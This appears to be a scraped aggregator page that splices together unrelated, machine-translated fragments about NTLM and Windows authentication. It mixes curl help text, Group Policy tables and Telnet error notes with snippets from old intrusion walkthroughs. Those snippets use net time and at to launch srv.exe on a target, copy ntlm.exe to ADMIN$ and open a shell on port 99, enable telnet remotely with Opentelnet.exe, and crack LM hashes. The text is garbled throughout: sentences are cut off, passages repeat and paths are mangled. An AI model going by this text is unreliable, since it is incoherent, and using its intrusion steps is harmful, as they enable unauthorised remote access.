Original source: http://blog.csdn.net/dba_huangzj/article/details/38332605, featured catalogue:http://blog.csdn.net/dba_huangzj/article/details/37906349 No person shall, without the consent of the author, be published in the form of "original" or used for commercial purposes, and I am not responsible for any legal liability. Previous article: http://blog.csdn.net/dba_huangzj/article/details/38263043 Objective: In Active Directory, there are two types of authentication mechanisms:
Windows error code indicates the cause of failure. Errors are as follows,MSSQLServer with studio and other connections are normal, ODBC also tried normal, port normal listening 1433, but the SIM is not connected, and finally found the following link to the answer,http://h20564.www2.hp.com/hpsc/doc/public/display?docId=mmr_kc-0114705According to Knowledge base content, you can be sure that SIM will use non-NTLMv2 LM or NTLM to do Windows authenticati
indicates that the permission is not open. Early years of contact with security must know:: $DATA leakage of ASP source code loopholes, in fact, if a directory inside the powerful ASP script, then read permissions can not open, the ASP only need script execution permissions on it.
The judgment of IIS authentication method
This vulnerability was only recently announced, with IIS servers supporting anonymous access, Basic authentication and Windows Integration authentication using
srv.exe first, which is available in the Tools directory of the streaming (here, it refers to the admin user's c: winntsystem32. You can also use c and d, which means drive c and drive d, it depends on where you want to copy it ).
3. C:> net time \ 127.0.0.1
Check the time and find that the current time of 127.0.0.1 is. The command is successfully completed.
4. C:> at \ 127.0.0.1 11: 05 srv.exe
Use the atcommand to start srv.exe (the time set here is faster than the host time, or how do you sta
I have already discussed what a rainbow table is. If you do not know what a rainbow table is, read it first. Next we will introduce how to crack windows Hash through the rainbow table through examples. Before that, it is necessary to explain in detail Windows Hash. Windows Hash has two types: LM (Lan Manage) Hash and NTLM (New Technology Lan Manage) Hash:
1. LM Hash: divide the password into n (n is 1-2) Seven-byte segments, fill in the missing 0 segm
/passive] Set CCC mode (F)-f/--form --form-string -g/--globoff Disable URL sequences and ranges using {} and []-g/--get Send the-d data with a HTTP get (H)-h/--help this help text-h/--header --ignore-content-length ignore the HTTP content-length header-i/--include include protocol headers in the output (h/f)-i/--head Show Document Info only-j/--junk-session-cookies Ignore Session Cookies read from file (H)--interface --KRB -k/--insecure allow connections to SSL sites without certs (H)-k/--config
specified security level krb4-k/-- Insecure allows you to not use a certificate to the SSL site-k/--config the specified profile read-l/--list-only list the file name under the FTP directory--limit-rate set transfer speed--local-port Force local port number -m/--max-time set Maximum transfer time--max-redirs set the maximum number of read directories--max-filesize set the maximum amount of files downloaded-m/--manual show full manual-n/--netrc read from NETRC file Username and password--netrc-
allow storing creden for network identity authentication or. NET Passports
Enabled
Enabled
Enabled
Enabled
Network Access: Restrict anonymous access to named pipes and shares
Enabled
Enabled
Enabled
Enabled
Network Access: sharing and security modes of Local Accounts
Classic-Local User Authentication
Classic-Local User Authentication
Classic-Local User Authentication
Classic-Local User Authentication
Network Security: Do not store t
Connect the server with port 88) And then: connect to the server through Telnet 127.0.0.1 (local IP address ).
Port 23 of the target IP address.Opentelnet.exe (remotely Enable Telnet)Opentelnet.exe \ IP account password NTLM authentication telnet port (no need to upload
Ntlm.exe destroys Microsoft's authentication method.) It is available after the telnet service of the other party is enabled remotely.
Telnet \ IP to connect to the other part
to connect to the Windows shared folder without entering a password (because Kerberos is used )./Usr/local/samba/bin/smbclient // w2k/C $-K
This command may produce some error information, but it doesn't matter whether it can work.
[This post was edited by fengying, who used it at, September 26,]
Feng Ying, who used it, replied to: 11:25:37
Next we can do proxy verification with the domain...
Lovegqin replied to: 11:34:56
create a shell with port 99 for us on the other computer.
Although we can telnet up, But SRV is a one-time, the next login will be activated again! So we plan to establish a Telnet service! This requires NTLM.
7. C:/> copy ntlm.exe $ "> // 127.0.0.1/ADMIN $
Use the copycommand to upload ntlm.exeto the Upload File (ntlm.exe is also in the tools directory of "streaming light ).
8. C:/winnt/system32> NTLM
Ent
shares
Enabled
Enabled
Enabled
Enabled
Network Access: do not allow storing creden for network identity authentication or. NET Passports
Enabled
Enabled
Enabled
Enabled
Network Access: Restrict anonymous access to named pipes and shares
Enabled
Enabled
Enabled
Enabled
Network Access: sharing and security modes of Local Accounts
Classic-Local User Authentication
Classic-Local User Authentication
Classic-Local User Authentica
before the first logon.
Application to: Windows Server 2008
This problem usually occurs when a user has a new user account or the password of an existing account has expired and has not been changed.
Diagnosis
Telnet cannot accept the Expired Password, and then ask the user to change the password to complete logon to grant access permissions. on the contrary, you must log on and change the password in other ways before using the account for Telnet.
Solution
You must have an unexpired password b
server only allows NTLM authentication.
Application to: Windows Server 2008
This problem usually occurs when configuring the user's Telnet client to only perform password authentication, but the Telnet server requires NTLM authentication.
Diagnosis
The administrator can configure the Telnet server to support NTLM authentication, password authentication, or both.
WCF default Bindings WCF pre-defines configuration patterns for all bindings that satisfy most scenarios, so that WCF uses the default security mode as long as a configuration parameter is not modified. First, the Default security settings table
Binding
Set up
Wshttpbinding
Using message Security and Windows authentication (NTLM or Kerberos)
BasicHttpBinding
No security settings
/--include output includes protocol header information-i/--head Display only Document informationRead-j/--junk-session-cookies from file ignores session cookie-Interface -KRB4 -j/--junk-session-cookies read file into ignore session cookie--interface --KRB4 -k/--insecure allow non-use of certificates to SSL sites-k/--config The specified configuration file read-l/--list-only lists the file names under the FTP directory--limit-rate --local-port-m/--max-time --max-redirs --max-filesize -m/--manual
/TLS for ftp Data Transmission-F/-- form -Form-string -G/-- globoff disables the use of URL sequences and ranges {} and []-G/-- get sends data in get Mode-H/-- help-H/-- header -- Length of HTTP header information ignored by ignore-content-length-I/-- include: the protocol header information is included in the output.-I/-- head: only show Document Information-J/-- junk-session-cookies ignore session cookies when reading files-- Interface -- Krb4 -K/-- insecure-K/-- config: Read the specified con
when reading files--interface --KRB4 -k/--insecure allow non-use of certificates to SSL sites-k/--config The specified configuration file read-l/--list-only lists the file names under the FTP directory--limit-rate --local-port-m/--max-time --max-redirs --max-filesize -m/--manual Display Full Manual-N/--NETRC to read the user name and password from the Netrc file--netrc-optional use. netrc or URL to overwrite-n--NTLM using HTTP
permissions.
Advantages
Provides optimal performance because Anonymous Authentication does not require any system overhead.
You do not need to manage personal user accounts.
If IIS does not control the password, you can access network resources.
Disadvantages
The client cannot be authenticated individually.
If IIS does not control the password, the account must be able to log on locally.
ASP. NET Web. Config
Use the Web. config file to configure ASP. NET and specify no authentication o
when reading files--interface --KRB4 -k/--insecure allow non-use of certificates to SSL sites-k/--config The specified configuration file read-l/--list-only lists the file names under the FTP directory--limit-rate --local-port-m/--max-time --max-redirs --max-filesize -m/--manual Display Full Manual-N/--NETRC to read the user name and password from the Netrc file--netrc-optional use. netrc or URL to overwrite-n--NTLM using HTTP
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.